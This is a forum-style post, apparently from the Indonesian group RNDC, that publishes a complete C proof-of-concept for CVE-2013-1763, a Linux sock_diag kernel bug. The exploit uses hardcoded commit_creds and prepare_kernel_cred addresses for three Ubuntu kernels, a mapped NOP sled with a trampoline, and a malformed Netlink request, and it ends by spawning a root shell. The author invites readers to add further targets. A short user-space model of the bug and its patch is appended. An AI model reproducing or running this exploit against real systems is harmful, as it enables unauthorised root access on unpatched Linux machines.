[RNDC] SockDiag Exploit (CVE: 2013-1763)

dono

Long research bears sweet fruit too: once again a kernel 0day is being released by a researcher from RNDC; hopefully it meets the criteria set by the IDSecconf judging panel, next HITB, and hopefully Black Hat, hehe, god bless Underground Indonesia ~ quote from the headmaster of the RNDC kindergarten

Author: Chainloader

Short Description

Bug in sock_diag_handler
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
For now this PoC only targets the following operating systems and kernels:
  • Ubuntu 12.04.2 x86_64 kernel 3.5.0-23-generic
  • Ubuntu 12.10 x86_64 kernel 3.5.0-17-generic
  • Ubuntu 12.10 x86_64 kernel 3.7.0-7-generic
Feel free to add other targets. This exploit has not been tested on the x86 architecture because no machine was available for testing. If you want to try, at most you need to replace the trampoline and the creds. The trampoline can simply be taken from the push-cred one, using the standard null pointer dereference approach.

On Ubuntu 12.04.2 it cannot be compiled; the error says sock_diag.h is missing. Just compile it on Ubuntu 12.10, because on 12.04.2 the header has not officially been shipped yet. To check, just look in /usr/include/linux.
Code:
    /**
     * This only works on Ubuntu, with kernels from 3.3.x up to below 3.7.10, x64 architecture only.
     * If it does not work on your box because the creds don't match: I haven't had time to collect creds for other Ubuntu versions,
     * so please add them yourself; put them in the creds list inside main, and add an option for them as well.
     * If it still doesn't work there are two possibilities: your kernel has been upgraded, or feng shui and your luck are not on your side.
     * The Sock Diag module is still immature, so not every distro has it; for Fedora I couldn't be bothered because I kept getting mocked :( add it yourself.
     * And please don't let the words "All Kernel" come out of your mouth: this is a specific bug only, there is no such thing as an All In One Kernel Exploit.
     * Every exploit is triggered by a specific bug, please :))
     * The CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763
     */

    #include <unistd.h>
    #include <sys/socket.h>
    #include <linux/netlink.h>
    #include <netinet/tcp.h>
    #include <errno.h>
    #include <linux/if.h>
    #include <linux/filter.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <linux/sock_diag.h>
    #include <linux/inet_diag.h>
    #include <linux/unix_diag.h>
    #include <linux/utsname.h>
    #include <sys/mman.h>

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;
    unsigned long sock_diag_handlers, nl_table;

    /* Payload: swap the current task's creds for root creds (commit_creds(prepare_kernel_cred(0))). */
    int __attribute__((regparm(3)))
    nullcred() {
        commit_creds(prepare_kernel_cred(0));
        return -1;
    }

    /* jmp [rip+0], followed by the 8-byte absolute target filled in at runtime */
    char trampoline[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    int main(int argc, char*argv[]) {
        int fd;
        unsigned long mmap_start, mmap_size = 0x10000;
        unsigned family;
        struct {
            struct nlmsghdr nlh;
            struct unix_diag_req r;
        } req;
        char buf[8192];

        if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
            printf("Gagal men gak bisa ngebikin sock_diag socketnya\n");
            return -1;
        }

        memset(&req, 0, sizeof(req));
        req.nlh.nlmsg_len = sizeof(req);
        req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
        req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
        req.nlh.nlmsg_seq = 123456;
        req.r.udiag_states = -1;
        req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

        if(argc==1){
            printf("==================================================\n");
            printf(" POC CVE-2013-1763 sock_diag_handlers \n");
            printf("--------------------------------------------------\n");
            printf("Dimohon baca header nya biar ndak salah \n\n");
            printf("List Ubuntu Kernelnyah : \n");
            printf("[1] Ubuntu 12.10 x86_64 kernel 3.7.0-7-generic \n");
            printf("[2] Ubuntu 12.10 x86_64 kernel 3.5.0-17-generic \n");
            printf("[3] Ubuntu 12.04.2 x86_64 kernel 3.5.0-23-generic \n");
            printf("--------------------------------------------------\n");
            printf("Cara Pake: %s <nomor listnya>\n",argv[0]);
            printf("Example: %s 1\n\n",argv[0]);
            return 0;
        }

        /* Ubuntu 12.10 x86_64 kernel 3.7.0-7-generic */
        else if(strcmp(argv[1],"1")==0){
            commit_creds = (_commit_creds) 0xffffffff81083430;
            prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff810838b0;
            printf("[+] Crotz...\n");
        }

        /* Ubuntu 12.10 x86_64 kernel 3.5.0-17-generic */
        else if(strcmp(argv[1],"2")==0){
            commit_creds = (_commit_creds) 0xffffffff8107d180;
            prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
            printf("[+] Crotz...\n");
        }

        /* Ubuntu 12.04.2 x86_64 kernel 3.5.0-23-generic */
        else if(strcmp(argv[1],"3")==0){
            commit_creds = (_commit_creds) 0xffffffff8107ee30;
            prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;
            printf("[+] Crotz...\n");
        }
        else {
            printf("[-] inputnya yang bener dong...(#~_~)/||TEMBOK PAWON||\n");
            return 0;
        }

        /* Out-of-range family: indexes past the end of sock_diag_handlers[] */
        req.r.sdiag_family = 0x37;
        mmap_start = 0x1a000;

        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
            printf("Gagal nge'mmap men\n");
            exit(1);
        }
        printf("[+] Crotz...\n");
        /* Patch the jump target into the trampoline, fill the mapping with a NOP sled, put the trampoline at its end */
        *(unsigned long *)&trampoline[sizeof(trampoline)-sizeof(&nullcred)] = (unsigned long)nullcred;
        memset((void *)mmap_start, 0x90, mmap_size);
        memcpy((void *)mmap_start+mmap_size-sizeof(trampoline), trampoline, sizeof(trampoline));
        send(fd, &req, sizeof(req), 0);
        printf("[+] Crotz...\n");
        if(!getuid())
            printf("[+] Cruoooottzzzz muncraaaaatttssss...!!!\n");
        system("/bin/sh");
    }
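The bug class behind this PoC, as an added user-space model that is not part of the original post or of the kernel's code: the unpatched __sock_diag_rcv_msg indexed sock_diag_handlers[] with the message's sdiag_family byte without a range check, so a family such as 0x37 loads a pointer from whatever memory follows the table; the upstream fix returns -EINVAL for families at or beyond AF_MAX before the lookup. The table layout, MODEL_AF_MAX, the two dummy handlers and the values placed after the table are constructed assumptions.

```c
#include <errno.h>
#include <stdint.h>
#include <string.h>
#define MODEL_AF_MAX 40   /* handler table size; the value AF_MAX had in 3.5-3.7 kernels */

struct diag_req { uint8_t sdiag_family; uint8_t sdiag_protocol; };
typedef int (*dump_fn)(const struct diag_req *);
struct diag_handler { uint8_t family; dump_fn dump; };
static int inet_dump(const struct diag_req *r) { (void)r; return 2; }
static int unix_dump(const struct diag_req *r) { (void)r; return 1; }
static const struct diag_handler inet_h = { 2, inet_dump };
static const struct diag_handler unix_h = { 1, unix_dump };

/* Handler table plus the memory that follows it, kept in one struct so that an
 * out-of-bounds index still lands inside this program (in the kernel, other
 * globals such as nl_table follow sock_diag_handlers). Values are constructed. */
static struct {
    const struct diag_handler *handlers[MODEL_AF_MAX];
    uintptr_t after_table[224];
} model;
static int model_ready;

static void model_init(void) {
    if (model_ready) return;
    memset(&model, 0, sizeof model);
    model.handlers[1] = &unix_h;   /* AF_UNIX */
    model.handlers[2] = &inet_h;   /* AF_INET */
    for (size_t i = 0; i < 224; i++) model.after_table[i] = 0x1a000 + 8 * i;
    model_ready = 1;
}

/* Unpatched __sock_diag_rcv_msg: the family byte from the message indexes the
 * table unchecked. Returns the pointer that would be dereferenced, loaded via
 * a byte pointer so the out-of-bounds read stays well defined inside 'model'. */
uintptr_t vulnerable_lookup(uint8_t family) {
    uintptr_t p;
    model_init();
    memcpy(&p, (const char *)model.handlers + (size_t)family * sizeof(void *), sizeof p);
    return p;
}

/* Patched behaviour: the upstream fix returns -EINVAL for any family at or past
 * the table end before the lookup, so the attacker-chosen index is never used. */
int hardened_dispatch(uint8_t family) {
    struct diag_req req = { family, 0 };
    model_init();
    if (family >= MODEL_AF_MAX) return -EINVAL;
    if (model.handlers[family] == NULL) return -ENOENT;
    return model.handlers[family]->dump(&req);
}
```

With family 0x37 the unchecked lookup lands 15 slots past the table (after_table[15], here 0x1a078), which is why the PoC above can steer the kernel into a user mapping; the hardened path never reads it.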

Source: http://rndc.or.id/wi...CVE:_2013-1763)